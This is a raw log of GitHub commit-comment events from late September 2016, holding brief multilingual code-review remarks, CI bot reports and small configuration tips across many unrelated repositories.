{"id":"4641335015","type":"CommitCommentEvent","actor":{"login":"MarkHerhold"},"repo":{"name":"BadgeUp/sponge-client"},"payload":{"comment":{"id":19235970,"position":null,"line":null,"path":null,"commit_id":"d36768ba45a47e38483dcae70ce8a2f1d9d12749","created_at":"2016-09-30T03:59:32Z","updated_at":"2016-09-30T03:59:32Z","body":":sheep: "}},"created_at":"2016-09-30T03:59:32Z"}
{"id":"4641335295","type":"CommitCommentEvent","actor":{"login":"MongDIep"},"repo":{"name":"nhantc/CTC-Project"},"payload":{"comment":{"id":19235971,"position":null,"line":null,"path":null,"commit_id":"f4b7318616618c208c632a8b2e14226e2fc4db4d","created_at":"2016-09-30T03:59:40Z","updated_at":"2016-09-30T03:59:40Z","body":"Add charactor assets"}},"created_at":"2016-09-30T03:59:40Z"}
{"id":"4641338532","type":"CommitCommentEvent","actor":{"login":"gabrielRosa"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19235976,"position":18,"line":18,"path":"src/modulo-01-java-OO/modulo-01/Inventario.java","commit_id":"8faa52deab34a405baf05f19dbce38168acb5b99","created_at":"2016-09-30T04:00:53Z","updated_at":"2016-09-30T04:00:53Z","body":"Item!? O código passará por revisão amanhã pela manhã,  poderia ter colocado um ToDo(esqueci)."}},"created_at":"2016-09-30T04:00:53Z"}
{"id":"4641339647","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19235979,"position":null,"line":null,"path":null,"commit_id":"614dbb891dc12c32f7f3c708f8931ee2ee4f64e7","created_at":"2016-09-30T04:01:22Z","updated_at":"2016-09-30T04:01:22Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Make entity pointers more stable to work with](https://trello.com/c/Qssd49Eb/100-make-entity-pointers-more-stable-to-work-with)"}},"created_at":"2016-09-30T04:01:22Z"}
{"id":"4641342252","type":"CommitCommentEvent","actor":{"login":"brambledn"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19235984,"position":1,"line":1,"path":"madanni/coupon/tpls.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T04:02:30Z","updated_at":"2016-09-30T04:02:30Z","body":"这里比较特殊itemTpl在多处使用"}},"created_at":"2016-09-30T04:02:30Z"}
{"id":"4641344832","type":"CommitCommentEvent","actor":{"login":"dapengzhang0"},"repo":{"name":"dapengzhang0/grpc-java"},"payload":{"comment":{"id":19235988,"position":13,"line":60,"path":"core/src/main/java/io/grpc/internal/ExponentialBackoffPolicy.java","commit_id":"93e090492fa12dfa8d2a67511862fb4ccccbe4d7","created_at":"2016-09-30T04:03:39Z","updated_at":"2016-09-30T04:03:39Z","body":"final or test"}},"created_at":"2016-09-30T04:03:39Z"}
{"id":"4641345987","type":"CommitCommentEvent","actor":{"login":"Jmaciasc"},"repo":{"name":"Jmaciasc/HolaMundo"},"payload":{"comment":{"id":19235990,"position":null,"line":null,"path":null,"commit_id":"6506f25fe0058dff24c5c246e4416105fc547bf1","created_at":"2016-09-30T04:04:11Z","updated_at":"2016-09-30T04:04:11Z","body":"Comentario"}},"created_at":"2016-09-30T04:04:11Z"}
{"id":"4641347496","type":"CommitCommentEvent","actor":{"login":"raitucarp"},"repo":{"name":"baihaki06/TourGolang"},"payload":{"comment":{"id":19235992,"position":null,"line":null,"path":null,"commit_id":"c344582415843aaede60bb8ab6072ee7112bd9aa","created_at":"2016-09-30T04:04:54Z","updated_at":"2016-09-30T04:04:54Z","body":"mantap..."}},"created_at":"2016-09-30T04:04:54Z"}
{"id":"4641349157","type":"CommitCommentEvent","actor":{"login":"lqdung-lockon"},"repo":{"name":"eccubevn/ec-cube"},"payload":{"comment":{"id":19235995,"position":null,"line":null,"path":null,"commit_id":"eef86ef72ea7fb759d8205b1e05c8157192730d0","created_at":"2016-09-30T04:05:37Z","updated_at":"2016-09-30T04:05:37Z","body":"-\tThe layout and message not match requirement => need confirm.\r\n- \tIn the Smartphone layout, the edit button, where is it? => need confirm"}},"created_at":"2016-09-30T04:05:37Z"}
{"id":"4641351096","type":"CommitCommentEvent","actor":{"login":"thet"},"repo":{"name":"plone/plone.patternslib"},"payload":{"comment":{"id":19236002,"position":null,"line":null,"path":null,"commit_id":"609d34aaf5768bfa5b931da2587edab186a91db4","created_at":"2016-09-30T04:06:33Z","updated_at":"2016-09-30T04:06:33Z","body":"I don't understand this one.... bower components should go in src/plone/patternslib/static/components\r\n... And I really forgot to add and push my bowerrc. This is done here: https://github.com/plone/plone.patternslib/commit/9734b1a98245106b799d197e2c0585a477b207e3"}},"created_at":"2016-09-30T04:06:33Z"}
{"id":"4641354515","type":"CommitCommentEvent","actor":{"login":"dapengzhang0"},"repo":{"name":"dapengzhang0/grpc-java"},"payload":{"comment":{"id":19236007,"position":52,"line":485,"path":"core/src/main/java/io/grpc/internal/TransportSet.java","commit_id":"93e090492fa12dfa8d2a67511862fb4ccccbe4d7","created_at":"2016-09-30T04:08:09Z","updated_at":"2016-09-30T04:08:09Z","body":"back-off"}},"created_at":"2016-09-30T04:08:09Z"}
{"id":"4641358297","type":"CommitCommentEvent","actor":{"login":"chrischristieGWB"},"repo":{"name":"wizpig64/csgohub"},"payload":{"comment":{"id":19236016,"position":null,"line":null,"path":null,"commit_id":"153797d760e8c8fa839566275357eabf90bd74ef","created_at":"2016-09-30T04:10:00Z","updated_at":"2016-09-30T04:10:00Z","body":"this is an amazing change A+++\r\n\r\n**HOO AH**"}},"created_at":"2016-09-30T04:10:00Z"}
{"id":"4641361429","type":"CommitCommentEvent","actor":{"login":"carl-j-love"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19236019,"position":null,"line":null,"path":null,"commit_id":"4bc6824da5f2f49aa2fe7ddbe4c228f3d7359248","created_at":"2016-09-30T04:11:29Z","updated_at":"2016-09-30T04:11:29Z","body":"What is this? I didn't make any changes to Haskell file! I've never even opened this particular file."}},"created_at":"2016-09-30T04:11:29Z"}
{"id":"4641362140","type":"CommitCommentEvent","actor":{"login":"wizpig64"},"repo":{"name":"wizpig64/csgohub"},"payload":{"comment":{"id":19236020,"position":null,"line":null,"path":null,"commit_id":"153797d760e8c8fa839566275357eabf90bd74ef","created_at":"2016-09-30T04:11:50Z","updated_at":"2016-09-30T04:11:50Z","body":"tyfam"}},"created_at":"2016-09-30T04:11:50Z"}
{"id":"4641365599","type":"CommitCommentEvent","actor":{"login":"SyouKawa"},"repo":{"name":"SyouKawa/jekyll_demo"},"payload":{"comment":{"id":19236026,"position":null,"line":null,"path":null,"commit_id":"22162f0a4d8aea7fa378ff2d9e15803eeb50d3cd","created_at":"2016-09-30T04:13:20Z","updated_at":"2016-09-30T04:13:20Z","body":"=。="}},"created_at":"2016-09-30T04:13:20Z"}
{"id":"4641371592","type":"CommitCommentEvent","actor":{"login":"dapengzhang0"},"repo":{"name":"dapengzhang0/grpc-java"},"payload":{"comment":{"id":19236042,"position":55,"line":609,"path":"netty/src/main/java/io/grpc/netty/NettyClientHandler.java","commit_id":"93e090492fa12dfa8d2a67511862fb4ccccbe4d7","created_at":"2016-09-30T04:16:09Z","updated_at":"2016-09-30T04:16:09Z","body":"Preconditions.checkState"}},"created_at":"2016-09-30T04:16:09Z"}
{"id":"4641374964","type":"CommitCommentEvent","actor":{"login":"ajkerr0"},"repo":{"name":"ajkerr0/kappa"},"payload":{"comment":{"id":19236059,"position":null,"line":null,"path":null,"commit_id":"35d355318e2f50370a85e8e652efe4dde78ee363","created_at":"2016-09-30T04:17:45Z","updated_at":"2016-09-30T04:17:45Z","body":"Because I think kde has trouble fitting 18 million points."}},"created_at":"2016-09-30T04:17:45Z"}
{"id":"4641375335","type":"CommitCommentEvent","actor":{"login":"DNepovim"},"repo":{"name":"janzeman3/reversi"},"payload":{"comment":{"id":19236061,"position":2,"line":2,"path":"players/abstract.py","commit_id":"ceaa61e975afab4cd82b6ddcbe7fc46381e00c6f","created_at":"2016-09-30T04:17:56Z","updated_at":"2016-09-30T04:17:56Z","body":"constants"}},"created_at":"2016-09-30T04:17:56Z"}
{"id":"4641376754","type":"CommitCommentEvent","actor":{"login":"adamcrume"},"repo":{"name":"rust-lang/rustup.sh"},"payload":{"comment":{"id":19236063,"position":null,"line":null,"path":null,"commit_id":"5059e4e7f74e955d65b63d7f0652a88af8c9cfae","created_at":"2016-09-30T04:18:35Z","updated_at":"2016-09-30T04:18:35Z","body":"This breaks workflows (like mine) where rust is installed in the user's home directory, and no root permissions are needed."}},"created_at":"2016-09-30T04:18:35Z"}
{"id":"4641378735","type":"CommitCommentEvent","actor":{"login":"danny-su"},"repo":{"name":"Komodo/komodo-go"},"payload":{"comment":{"id":19236068,"position":null,"line":null,"path":null,"commit_id":"14282c20d7b8c5e33c89d90c716665d15bcac346","created_at":"2016-09-30T04:19:32Z","updated_at":"2016-09-30T04:19:32Z","body":"It seems that the fix doesn't work on windows, because %(go)fmt may be resolved to \"xxx\\go.exefmt\".\r\nI used the absolute path of gofmt, as follows:\r\n```\r\nargs_prefset.setStringPref(\"executable\", \"**C:/Go/bin/gofmt.exe**\")\r\nargs_prefset.setStringPref(\"arguments\", \"-w=false\")\r\n```\r\nand then fixed the %localappdata%\\ActiveState\\KomodoIDE\\10.1\\prefs.xml file:\r\n```\r\n<preference-set id=\"{cf500001-ec59-4047-86e7-369d257f4b80}\">\r\n  <string id=\"formatter_name\">generic</string>\r\n<preference-set id=\"genericFormatterPrefs\">\r\n  <string id=\"arguments\">-w=false</string>\r\n  <string id=\"executable\">**C:/Go/bin/gofmt.exe**</string>\r\n</preference-set>\r\n  <string id=\"lang\">Go</string>\r\n  <string id=\"name\">GoFmt</string>\r\n  <string id=\"uuid\">{cf500001-ec59-4047-86e7-369d257f4b80}</string>\r\n</preference-set>\r\n```\r\nIt works very well, I hope this helps."}},"created_at":"2016-09-30T04:19:32Z"}
{"id":"4641378858","type":"CommitCommentEvent","actor":{"login":"hoand-vn"},"repo":{"name":"eccubevn/ec-cube"},"payload":{"comment":{"id":19236069,"position":14,"line":139,"path":"tests/Eccube/Tests/Web/ShoppingControllerWithMultipleTest.php","commit_id":"478cf7971d2fc4ae60d166296f53fb27d041fec2","created_at":"2016-09-30T04:19:36Z","updated_at":"2016-09-30T04:19:36Z","body":"please not comment in-line"}},"created_at":"2016-09-30T04:19:36Z"}
{"id":"4641380867","type":"CommitCommentEvent","actor":{"login":"DNepovim"},"repo":{"name":"janzeman3/reversi"},"payload":{"comment":{"id":19236076,"position":28,"line":28,"path":"players/abstract.py","commit_id":"ceaa61e975afab4cd82b6ddcbe7fc46381e00c6f","created_at":"2016-09-30T04:20:32Z","updated_at":"2016-09-30T04:20:32Z","body":"Return by se mi víc líbilo na posledním řádku metody s jasnou proměněnnou."}},"created_at":"2016-09-30T04:20:32Z"}
{"id":"4641381075","type":"CommitCommentEvent","actor":{"login":"mfenner"},"repo":{"name":"datacite/spinone"},"payload":{"comment":{"id":19236077,"position":5,"line":60,"path":"app/models/contribution.rb","commit_id":"e3958aab68be170bd8bc7b2032ac5e0b2901cf08","created_at":"2016-09-30T04:20:37Z","updated_at":"2016-09-30T04:20:37Z","body":"Moved publishers include into separate method."}},"created_at":"2016-09-30T04:20:37Z"}
{"id":"4641390730","type":"CommitCommentEvent","actor":{"login":"Qianjuan"},"repo":{"name":"Qianjuan/jinzheng.github.io"},"payload":{"comment":{"id":19236096,"position":null,"line":null,"path":null,"commit_id":"7cdd2ea50407a2f3d29c8f9ce161a8a601316dbf","created_at":"2016-09-30T04:25:13Z","updated_at":"2016-09-30T04:25:13Z","body":"123"}},"created_at":"2016-09-30T04:25:13Z"}
{"id":"4641392940","type":"CommitCommentEvent","actor":{"login":"freeman-ng"},"repo":{"name":"SekoiaLab/Fastir_Collector_Linux"},"payload":{"comment":{"id":19236099,"position":null,"line":null,"path":null,"commit_id":"f390c6bcae68334b48ecb0388b587ebd9af309f1","created_at":"2016-09-30T04:26:14Z","updated_at":"2016-09-30T04:26:14Z","body":"Hi,\r\nI have tried fastIR_collector_linux.py on Debian and Ubuntu and it was fine.\r\nBut I hit into syntex error messages when I ran it on CentOS. I am going to try on RedHat soon.\r\nAny advice?\r\nRegards,\r\nFreeman"}},"created_at":"2016-09-30T04:26:14Z"}
{"id":"4641393096","type":"CommitCommentEvent","actor":{"login":"victorgama"},"repo":{"name":"BrianLima/SharpSteam"},"payload":{"comment":{"id":19236100,"position":44,"line":52,"path":"SharpSteam/SteamManager.cs","commit_id":"a86fde6c17d9f0b8c9e8ad65f8033488489050cf","created_at":"2016-09-30T04:26:19Z","updated_at":"2016-09-30T04:26:19Z","body":"Beware: when the condition on line 47 is satisfied, this will probably raise an exception. Seems safer to move this into an `else` clause or just return an empty array instead of creating the file."}},"created_at":"2016-09-30T04:26:19Z"}
{"id":"4641394602","type":"CommitCommentEvent","actor":{"login":"LeeTheCoder"},"repo":{"name":"LeeTheCoder/medic_kiosk"},"payload":{"comment":{"id":19236104,"position":null,"line":null,"path":null,"commit_id":"89d5f6bebed481829a27645918a8416e1cfa31ec","created_at":"2016-09-30T04:27:02Z","updated_at":"2016-09-30T04:27:02Z","body":"**facepalm**\r\nI can't even spell README correctly today."}},"created_at":"2016-09-30T04:27:02Z"}
{"id":"4641397413","type":"CommitCommentEvent","actor":{"login":"TheSpaceCoder"},"repo":{"name":"TheSpaceCoder/mySchool"},"payload":{"comment":{"id":19236109,"position":null,"line":null,"path":null,"commit_id":"bbb18da0bd177b3192f88ddb8ed9bdf2c24c2ffb","created_at":"2016-09-30T04:28:24Z","updated_at":"2016-09-30T04:28:24Z","body":"i was tired and forgot to do this in the main commit"}},"created_at":"2016-09-30T04:28:24Z"}
{"id":"4641398916","type":"CommitCommentEvent","actor":{"login":"DNepovim"},"repo":{"name":"janzeman3/reversi"},"payload":{"comment":{"id":19236113,"position":41,"line":41,"path":"players/abstract.py","commit_id":"ceaa61e975afab4cd82b6ddcbe7fc46381e00c6f","created_at":"2016-09-30T04:29:10Z","updated_at":"2016-09-30T04:29:10Z","body":"list of two integers"}},"created_at":"2016-09-30T04:29:10Z"}
{"id":"4641399280","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19236116,"position":null,"line":null,"path":null,"commit_id":"e965863f4bf95041f60d207d606d2dc621a9e0fa","created_at":"2016-09-30T04:29:20Z","updated_at":"2016-09-30T04:29:20Z","body":"buildingunit (nmerket) - i386-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e965863f4bf95041f60d207d606d2dc621a9e0fa-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e965863f4bf95041f60d207d606d2dc621a9e0fa-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-20.19%25-red.svg)</a> \n"}},"created_at":"2016-09-30T04:29:20Z"}
{"id":"4641404057","type":"CommitCommentEvent","actor":{"login":"DNepovim"},"repo":{"name":"janzeman3/reversi"},"payload":{"comment":{"id":19236124,"position":39,"line":39,"path":"players/abstract.py","commit_id":"ceaa61e975afab4cd82b6ddcbe7fc46381e00c6f","created_at":"2016-09-30T04:31:39Z","updated_at":"2016-09-30T04:31:39Z","body":"Every item contain list with three integers: x coordinate, y coordinate and field value"}},"created_at":"2016-09-30T04:31:39Z"}
{"id":"4641406560","type":"CommitCommentEvent","actor":{"login":"Disbe"},"repo":{"name":"greatelv/canon"},"payload":{"comment":{"id":19236129,"position":9,"line":9,"path":"be/BackCanonProject/src/main/java/com/canon/normal/resource.properties","commit_id":"6b89198082c648d20174381695d22017fa1ceea8","created_at":"2016-09-30T04:32:54Z","updated_at":"2016-09-30T04:32:54Z","body":"'인증없이 푼다'의 개념을 이해하지 못했습니다. 더 공부하겠습니다만 한번 더 설명을 부탁드릴 수 있을까요?"}},"created_at":"2016-09-30T04:32:54Z"}
{"id":"4641406886","type":"CommitCommentEvent","actor":{"login":"rgurganus"},"repo":{"name":"Alvine-IO/php7-windows"},"payload":{"comment":{"id":19236131,"position":null,"line":null,"path":null,"commit_id":"4f0cd68ee4f79c25703ab547019ac55f2a4e1d58","created_at":"2016-09-30T04:33:05Z","updated_at":"2016-09-30T04:33:05Z","body":"do you have a x64/nts version of this php_memcache dll?  I have looked everywhere but can't find one."}},"created_at":"2016-09-30T04:33:05Z"}
{"id":"4641412218","type":"CommitCommentEvent","actor":{"login":"dcousens"},"repo":{"name":"substack/tape"},"payload":{"comment":{"id":19236139,"position":null,"line":null,"path":null,"commit_id":"c1b483c8c4d3f58677bacc106be13708dd73ef75","created_at":"2016-09-30T04:35:44Z","updated_at":"2016-09-30T04:35:44Z","body":"Any chance of a release for this?"}},"created_at":"2016-09-30T04:35:44Z"}
{"id":"4641416323","type":"CommitCommentEvent","actor":{"login":"keolo"},"repo":{"name":"mordaroso/mixpanel_client"},"payload":{"comment":{"id":19236151,"position":null,"line":null,"path":null,"commit_id":"bd21e204d5433f8452edc26f5b70c4e23f2bbe30","created_at":"2016-09-30T04:37:53Z","updated_at":"2016-09-30T04:37:53Z","body":"This is some nice work. There was another fix that was just merged into `master`. However, if you'd like to open a pull request, I can help get it merged in."}},"created_at":"2016-09-30T04:37:53Z"}
{"id":"4641417985","type":"CommitCommentEvent","actor":{"login":"pelikhan"},"repo":{"name":"Microsoft/pxt"},"payload":{"comment":{"id":19236157,"position":58,"line":1399,"path":"webapp/src/app.tsx","commit_id":"3f9dbf7b0b6e5bf3a68d067435d61d7f9c853f3f","created_at":"2016-09-30T04:38:45Z","updated_at":"2016-09-30T04:38:45Z","body":"This regex will fail for all file names besides \".hex\""}},"created_at":"2016-09-30T04:38:45Z"}
{"id":"4641421367","type":"CommitCommentEvent","actor":{"login":"keolo"},"repo":{"name":"Soundflyinc/mixpanel_client"},"payload":{"comment":{"id":19236161,"position":11,"line":164,"path":"lib/mixpanel/client.rb","commit_id":"812d0c43f2ba045b357d27626ee81adf4975a808","created_at":"2016-09-30T04:40:24Z","updated_at":"2016-09-30T04:40:24Z","body":"Would this also work?\r\n\r\n    elsif resourse == 'import' || resource.start_with? 'api'"}},"created_at":"2016-09-30T04:40:24Z"}
{"id":"4641422558","type":"CommitCommentEvent","actor":{"login":"touyou"},"repo":{"name":"touyou/WordListSwift3"},"payload":{"comment":{"id":19236163,"position":20,"line":24,"path":"wordList0625/AddViewController.swift","commit_id":"e1ccd23be7cf7f3cd60701b85c5cc7c54ba467d6","created_at":"2016-09-30T04:41:01Z","updated_at":"2016-09-30T04:41:01Z","body":"## saveDataからの取り出し方パターン①"}},"created_at":"2016-09-30T04:41:01Z"}
{"id":"4641423761","type":"CommitCommentEvent","actor":{"login":"watchlondon"},"repo":{"name":"WordPress/theme-check"},"payload":{"comment":{"id":19236164,"position":4,"line":8,"path":"theme-check.php","commit_id":"406b26f405527e7afd6733e1b4581aa2941029c6","created_at":"2016-09-30T04:41:32Z","updated_at":"2016-09-30T04:41:32Z","body":"20160523.1"}},"created_at":"2016-09-30T04:41:32Z"}
{"id":"4641423899","type":"CommitCommentEvent","actor":{"login":"touyou"},"repo":{"name":"touyou/WordListSwift3"},"payload":{"comment":{"id":19236165,"position":28,"line":32,"path":"wordList0625/ListTableViewController.swift","commit_id":"e1ccd23be7cf7f3cd60701b85c5cc7c54ba467d6","created_at":"2016-09-30T04:41:37Z","updated_at":"2016-09-30T04:41:37Z","body":"## saveDataからの取り出し方パターン②"}},"created_at":"2016-09-30T04:41:37Z"}
{"id":"4641424282","type":"CommitCommentEvent","actor":{"login":"Jagged"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19236166,"position":null,"line":null,"path":null,"commit_id":"87f911768765d398d792809edf961af853634a07","created_at":"2016-09-30T04:41:46Z","updated_at":"2016-09-30T04:41:46Z","body":"As you can see above I committed in Default and OrThrow before you replied.  I tried a few variations for xxxThrow and have to agree, DefaultThrow felt very off, as did OtherwiseThrow.  Ask me tomorrow and I might rename things again!  I guess at this point things are getting subjective, which is OK as that means we're in the right ballpark.  \r\n\r\nxxx.Match(this).Match(that).Default(def)\r\nxxx.Match(this).Match(that).Else(def)               // hmm, warming to it\r\nxxx.Match(this).Match(that).Otherwise(def)\r\n\r\nxxx.Match(this).Match(that).OrThrow(def)\r\nxxx.Match(this).Match(that).ElseThrow(def)      // warming to this too, dammit    \r\nxxx.Match(this).Match(that).DefaultThrow(def)\r\nxxx.Match(this).Match(that).OtherwiseThrow(def)\r\n\r\n"}},"created_at":"2016-09-30T04:41:46Z"}
{"id":"4641424799","type":"CommitCommentEvent","actor":{"login":"touyou"},"repo":{"name":"touyou/WordListSwift3"},"payload":{"comment":{"id":19236168,"position":58,"line":59,"path":"wordList0625/ListTableViewController.swift","commit_id":"e1ccd23be7cf7f3cd60701b85c5cc7c54ba467d6","created_at":"2016-09-30T04:42:01Z","updated_at":"2016-09-30T04:42:01Z","body":"## as? Stringの代替案①"}},"created_at":"2016-09-30T04:42:01Z"}
{"id":"4641425634","type":"CommitCommentEvent","actor":{"login":"touyou"},"repo":{"name":"touyou/WordListSwift3"},"payload":{"comment":{"id":19236172,"position":45,"line":47,"path":"wordList0625/QuestionViewController.swift","commit_id":"e1ccd23be7cf7f3cd60701b85c5cc7c54ba467d6","created_at":"2016-09-30T04:42:28Z","updated_at":"2016-09-30T04:42:28Z","body":"## saveDataからの取り出し方パターン③"}},"created_at":"2016-09-30T04:42:28Z"}
{"id":"4641426397","type":"CommitCommentEvent","actor":{"login":"DNepovim"},"repo":{"name":"janzeman3/reversi"},"payload":{"comment":{"id":19236175,"position":28,"line":28,"path":"players/abstract.py","commit_id":"ceaa61e975afab4cd82b6ddcbe7fc46381e00c6f","created_at":"2016-09-30T04:42:48Z","updated_at":"2016-09-30T04:42:48Z","body":"Funkce a konstanty využívané celým programem bych přesunul do základní abstraktní třídy, ze které bude tato dědit. Do souboru bych dával právě jednu třídu a snažil bych se vše mít ve třídách. "}},"created_at":"2016-09-30T04:42:48Z"}
{"id":"4641426579","type":"CommitCommentEvent","actor":{"login":"touyou"},"repo":{"name":"touyou/WordListSwift3"},"payload":{"comment":{"id":19236177,"position":59,"line":59,"path":"wordList0625/QuestionViewController.swift","commit_id":"e1ccd23be7cf7f3cd60701b85c5cc7c54ba467d6","created_at":"2016-09-30T04:42:54Z","updated_at":"2016-09-30T04:42:54Z","body":"## as? Stringの代替案②"}},"created_at":"2016-09-30T04:42:54Z"}
{"id":"4641430516","type":"CommitCommentEvent","actor":{"login":"romanlukichev"},"repo":{"name":"romanlukichev/course_test"},"payload":{"comment":{"id":19236188,"position":null,"line":null,"path":null,"commit_id":"60763dbf18910fa21ca3d26ec7671d9277d13ed3","created_at":"2016-09-30T04:44:52Z","updated_at":"2016-09-30T04:44:52Z","body":"https://www.youtube.com/watch?v=l8M1gmsZxSU\r\nЗадачи на собеседовании с проверкой решений Java Maven TDD JUnit IDEA Git"}},"created_at":"2016-09-30T04:44:52Z"}
{"id":"4641431101","type":"CommitCommentEvent","actor":{"login":"samirsss"},"repo":{"name":"brocade/pynos"},"payload":{"comment":{"id":19236190,"position":null,"line":null,"path":null,"commit_id":"567886c58d1bb035194808b689a4ceeca3dce6eb","created_at":"2016-09-30T04:45:08Z","updated_at":"2016-09-30T04:45:08Z","body":"Looks good to me"}},"created_at":"2016-09-30T04:45:08Z"}
{"id":"4641431824","type":"CommitCommentEvent","actor":{"login":"watchlondon"},"repo":{"name":"WordPress/theme-check"},"payload":{"comment":{"id":19236191,"position":5,"line":8,"path":"theme-check.php","commit_id":"406b26f405527e7afd6733e1b4581aa2941029c6","created_at":"2016-09-30T04:45:26Z","updated_at":"2016-09-30T04:45:26Z","body":"20160523.1"}},"created_at":"2016-09-30T04:45:26Z"}
{"id":"4641436465","type":"CommitCommentEvent","actor":{"login":"danielsigit"},"repo":{"name":"danielsigit/192.168.1.254"},"payload":{"comment":{"id":19236200,"position":null,"line":null,"path":null,"commit_id":"a983fdeac798b1c3f9d375fc541e09725a475ec2","created_at":"2016-09-30T04:47:38Z","updated_at":"2016-09-30T04:47:38Z","body":"tengkyu niih"}},"created_at":"2016-09-30T04:47:38Z"}
{"id":"4641436637","type":"CommitCommentEvent","actor":{"login":"danielsigit"},"repo":{"name":"danielsigit/192.168.1.254"},"payload":{"comment":{"id":19236201,"position":null,"line":null,"path":null,"commit_id":"a983fdeac798b1c3f9d375fc541e09725a475ec2","created_at":"2016-09-30T04:47:43Z","updated_at":"2016-09-30T04:47:43Z","body":"figo noob"}},"created_at":"2016-09-30T04:47:43Z"}
{"id":"4641437416","type":"CommitCommentEvent","actor":{"login":"soso8531337"},"repo":{"name":"soso8531337/uhp"},"payload":{"comment":{"id":19236202,"position":null,"line":null,"path":null,"commit_id":"d25734dedbf7bd84f78ddf7b13d8b468c51eba2e","created_at":"2016-09-30T04:48:03Z","updated_at":"2016-09-30T04:48:03Z","body":"APP_DEAD状态时 就不会再设置为APP_SHUTDOWN， 整理编译问题ppoll"}},"created_at":"2016-09-30T04:48:03Z"}
{"id":"4641438356","type":"CommitCommentEvent","actor":{"login":"kawasima"},"repo":{"name":"seki-seki/job-streamer-custom-console"},"payload":{"comment":{"id":19236204,"position":3,"line":3,"path":"README.md","commit_id":"723ce3fdfcab2e58b8314177999b2746f688c719","created_at":"2016-09-30T04:48:30Z","updated_at":"2016-09-30T04:48:30Z","body":"Typo"}},"created_at":"2016-09-30T04:48:30Z"}
{"id":"4641446081","type":"CommitCommentEvent","actor":{"login":"carl-j-love"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19236225,"position":null,"line":null,"path":null,"commit_id":"ccdc13171f6787b5eee31547158b41bf3e38e82c","created_at":"2016-09-30T04:52:13Z","updated_at":"2016-09-30T04:52:13Z","body":"What's an example of a valid use case of Ret(Not(algebraic))?"}},"created_at":"2016-09-30T04:52:13Z"}
{"id":"4641448327","type":"CommitCommentEvent","actor":{"login":"alexgreen"},"repo":{"name":"TheTyee/design-article.thetyee.ca"},"payload":{"comment":{"id":19236233,"position":null,"line":null,"path":null,"commit_id":"486d7e2317bd3acca7d3b66441f19235553c58bc","created_at":"2016-09-30T04:53:20Z","updated_at":"2016-09-30T04:53:20Z","body":"What does the \"remove\" class do here?"}},"created_at":"2016-09-30T04:53:20Z"}
{"id":"4641448747","type":"CommitCommentEvent","actor":{"login":"greatelv"},"repo":{"name":"greatelv/canon"},"payload":{"comment":{"id":19236235,"position":9,"line":9,"path":"be/BackCanonProject/src/main/java/com/canon/normal/resource.properties","commit_id":"6b89198082c648d20174381695d22017fa1ceea8","created_at":"2016-09-30T04:53:33Z","updated_at":"2016-09-30T04:53:33Z","body":"아아 mysql 설치하면 기본 로그인 계정으로 바꿔달라는 이야기야 ㅎㅎ\r\nanonymity도 괜찮아"}},"created_at":"2016-09-30T04:53:33Z"}
{"id":"4641451180","type":"CommitCommentEvent","actor":{"login":"hardikupadhyay16"},"repo":{"name":"charusat09/kms"},"payload":{"comment":{"id":19236239,"position":59,"line":60,"path":"app/controllers/api/v1/articles_controller.rb","commit_id":"e0e89496839203353caee700da4b9b7dc3895089","created_at":"2016-09-30T04:54:53Z","updated_at":"2016-09-30T04:54:53Z","body":"Please return message on \"render_success\" method instead of \"render_error\""}},"created_at":"2016-09-30T04:54:53Z"}
{"id":"4641451565","type":"CommitCommentEvent","actor":{"login":"NetDEF-CI"},"repo":{"name":"opensourcerouting/quagga"},"payload":{"comment":{"id":19236242,"position":null,"line":null,"path":null,"commit_id":"d8b6809a5842c9c9ca1fc96a5ff2184e0c998cd5","created_at":"2016-09-30T04:55:04Z","updated_at":"2016-09-30T04:55:04Z","body":"# Continous Integration Result: SUCCESSFUL\n\nCongratulations, this patch passed basic tests\n\nTested-by: NetDEF / OpenSourceRouting.org CI System\n\n__CI System Testrun URL: https://ci1.netdef.org/browse/QUAGGA-GITHUBOSRQUAGGA-143/__\n\nThis is a comment from an EXPERIMENTAL automated CI system.\nFor questions and feedback in regards to this CI system, please feel free to email\nMartin Winter - mwinter (at) opensourcerouting.org.\n\n"}},"created_at":"2016-09-30T04:55:04Z"}
{"id":"4641454494","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19236248,"position":null,"line":null,"path":null,"commit_id":"cb4ba3f7b946433175b18818bbcc9d34e8f19215","created_at":"2016-09-30T04:56:27Z","updated_at":"2016-09-30T04:56:27Z","body":"Also see [Issue 312: Coverity finding CID 148134, 148138: Uninitialized scalar field (UNINIT_CTOR)](https://github.com/weidai11/cryptopp/issues/312)."}},"created_at":"2016-09-30T04:56:27Z"}
{"id":"4641455578","type":"CommitCommentEvent","actor":{"login":"hardikupadhyay16"},"repo":{"name":"charusat09/kms"},"payload":{"comment":{"id":19236254,"position":8,"line":3,"path":"app/controllers/api/v1/base_controller.rb","commit_id":"e0e89496839203353caee700da4b9b7dc3895089","created_at":"2016-09-30T04:56:57Z","updated_at":"2016-09-30T04:56:57Z","body":"Please remove \"current_user\" method as we have already \"authorize_user!\" method."}},"created_at":"2016-09-30T04:56:57Z"}
